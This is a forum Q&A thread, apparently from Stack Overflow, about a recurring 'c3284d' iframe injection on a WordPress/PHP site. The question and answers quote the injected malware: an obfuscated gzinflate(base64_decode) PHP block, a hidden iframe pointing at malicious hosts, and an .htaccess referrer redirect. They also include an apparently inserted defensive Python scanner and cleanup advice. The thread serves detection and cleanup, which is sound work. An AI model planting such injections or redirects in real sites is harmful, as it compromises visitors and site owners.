Mark

Reputation: 812

Website iframe attack - inserts code into source

Over the last few days, my website has repeatedly been the target of an iframe attack. The code is appended mainly to PHP and Javascript pages. The code is then PHP base64 encoded, see example (I've changed the code slightly to neutralise it):

#c3284d#
echo(gzinflate(base64_decode("aJ1yhA3pkW4cWnUnmFluNmeq66wqE0OmVRcMUP3WQAupFZFGgaJvSE7IZH67z5S8    VwMxbWwg/TRkFvtPyCw9AGGzqRm8Qi/1LV6+9MdTtf9rtXb8e4L")));
#/c3284d#

This decoded looks something like this:

<script type="text/javascript">
    document.write(
        '<iframe src="http://opticmoxie.com/xxxxxxx.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'
    );
</script>

The one thing in common is that all the code has the comment "#c3284d#" so tracking down the malicious code is not difficult. But it is time consuming...

We're on a shared server at Gradwell (UK) and they have not been particularly helpful. So the question is what can I do to stop this issue from repeating itself? I am aware of MySQL Injection attacks and use PHP's mysql_real_escape_string to guard against such attacks.

The site is PHP and MySQL driven. We use MySQLFTP and have a shell account for SSH access. We use Wordpress (latest update with plugins de-activated).

Upvotes: 6

Views: 7532

Answers (8)

Nemesis

Reputation: 22

Bad guys have access to your code, so you have to close their access. In the meantime you can use a simple script that checks and deletes all lines where it detects gzinflate(base64_decode, but even the best code (checksum checker with backup files) will be useless if they still have access.

Upvotes: -1
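A defender-side scanner for the pattern the question shows and the script this answer suggests, added here as an example that is not from the question or any answer: it finds the #c3284d# / <!--c3284d--> marker blocks under a web root, strips them while keeping a backup of each original, and only reports (never deletes) gzinflate(base64_decode( calls that lack the marker, since those may be legitimate. The file names, the payload string and the sample web root are constructed for the example.

```python
import re
import tempfile
from pathlib import Path

# Marker pairs seen in the thread: "#c3284d# ... #/c3284d#" (PHP, .htaccess) and
# "<!--c3284d--> ... <!--/c3284d-->" (emitted HTML/JS); plus the bare obfuscation wrapper.
MARKER_RE = re.compile(r"(?:#c3284d#|<!--c3284d-->).*?(?:#/c3284d#|<!--/c3284d-->)[ \t]*\n?", re.DOTALL)
INFLATE_RE = re.compile(r"gzinflate\s*\(\s*base64_decode\s*\(", re.IGNORECASE)

def find_infections(text):
    """Spans of marked blocks, plus offsets of wrapper calls outside any marked block."""
    blocks = [m.span() for m in MARKER_RE.finditer(text)]
    unmarked = [m.start() for m in INFLATE_RE.finditer(text)
                if not any(s <= m.start() < e for s, e in blocks)]
    return blocks, unmarked

def clean_text(text):
    """Remove every marked block and leave everything else intact."""
    return MARKER_RE.sub("", text)

def scan_tree(root, fix=False):
    """Report {relpath: (marked, unmarked)}; with fix=True strip marked blocks after saving a .c3284d.bak copy."""
    report = {}
    for path in Path(root).rglob("*"):
        if not path.is_file() or (path.suffix not in (".php", ".js", ".html") and path.name != ".htaccess"):
            continue
        text = path.read_text(encoding="utf-8", errors="surrogateescape")  # round-trips arbitrary bytes
        blocks, unmarked = find_infections(text)
        if blocks or unmarked:
            report[path.relative_to(root).as_posix()] = (len(blocks), len(unmarked))
        if fix and blocks:  # unmarked hits are left for manual review, never auto-deleted
            path.with_name(path.name + ".c3284d.bak").write_bytes(path.read_bytes())
            path.write_text(clean_text(text), encoding="utf-8", errors="surrogateescape")
    return report

# Constructed sample site modelled on the snippets in the thread (payload is a placeholder).
SAMPLES = {
    "index.php": '<?php echo "hi"; ?>\n#c3284d#\necho(gzinflate(base64_decode("PLACEHOLDER")));\n#/c3284d#\n',
    "js/app.js": "var a = 1;\n<!--c3284d--><script>document.write('<iframe src=\"http://example.invalid/s.php\"></iframe>');</script><!--/c3284d-->\n",
    ".htaccess": "#c3284d#\n<IfModule mod_rewrite.c>\nRewriteEngine On\n</IfModule>\n#/c3284d#\nOptions -Indexes\n",
    "lib/cache.php": "<?php $d = gzinflate(base64_decode($cached)); ?>\n",  # legitimate use, no marker
}

def demo(fix=True):
    # Write the samples to a fresh temp dir, scan/clean it, return (report, contents afterwards).
    root = Path(tempfile.mkdtemp())
    for name, body in SAMPLES.items():
        (root / name).parent.mkdir(parents=True, exist_ok=True)
        (root / name).write_text(body)
    report = scan_tree(root, fix=fix)
    return report, {n: (root / n).read_text() for n in SAMPLES}
```

Run demo(fix=False) first to get the report only; the .c3284d.bak copies and the web server's FTP/access logs are what you keep for working out how the files were written in the first place.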

Filipe YaBa Polido

Reputation: 1674

I recommend that you take a look at this:
http://websiteprotection.blogspot.pt/2009/10/measures-to-prevent-and-detect-iframe.html
It also has a script to clean it up.

Upvotes: 1

Rabbie

Reputation: 1781

I had the same problem and found that the method they used to get in was a hacked ftp password.

Even though this is running on a cPanel server with CPHulk brute force protection enabled, I found that the hackers attempted to brute force their way in via thousands of different compromised hosts.

Fortunately I had a log of all the files that were uploaded so I wrote a script to restore these files from backups.

I then increased the cPanel brute force protection levels by reducing the number of failed attempts required before the account is locked.

Upvotes: 1

Lukas

Reputation: 11

Had the same problem on all Wordpress sites that I administered. Didn't find the source of infection; I bet that it's some worm on my computer or it's some plugin that I installed on all sites.

I found all files that were modified in the WP-Better Security plugin logs and deleted the additional infected code, and afterwards I made chmod 444 on all files that were the source of infection.

Now I've been free for 1 month from evil iframes/.htaccess and other stuff.

Upvotes: 1

user604234

Reputation:

I had the same problem but in a Wordpress site.

I guess the site was infected through the widgets, because I use one plugin which allows PHP code to be executed.

My best solution was:

  • eliminate the suspicious widget;
  • see the time and date of one infected file (my case: header.php);
  • clear all infected files (in my case I have a backup of the site);
  • search the log file for suspicious IPs at that time (search for the found IPs on blacklists);
  • install one plugin to ban suspicious IPs.

From that moment the problem was gone. I hope this will help you.

Upvotes: 1

Thang

Reputation: 51

I also have the same problem. In my case the appended code is

<!--c3284d--><script type="text/javascript">
document.write('<iframe src="http://poseyhumane.org/stats.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
</script><!--/c3284d-->

In addition, there is a .htaccess file as below:

#c3284d#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://onestopchinasource.com/catalog/stats.php [R=301,L]
</IfModule>
#/c3284d#

I found two articles about this issue: http://www.webmasterworld.com/html/4472821.htm and http://stopmalvertising.com/malware-reports/the-c3284d-malware-network-stats.php.html

Hope it helps.

Upvotes: 0

Larry

Reputation: 11

I have the same problem and variants of different hacked files on many different domains. The one common thing I notice is Wordpress. We have Wordpress on many of these servers and I think that is the common culprit. I've updated all my Wordpress accounts and changed all passwords for all domain accounts. Not sure if the problem is totally resolved yet.

Upvotes: 1

abaumg

Reputation: 2273

I had the same issue. The FTP server's access logs showed that the modifications were made using a hacked FTP password.

Upvotes: 1
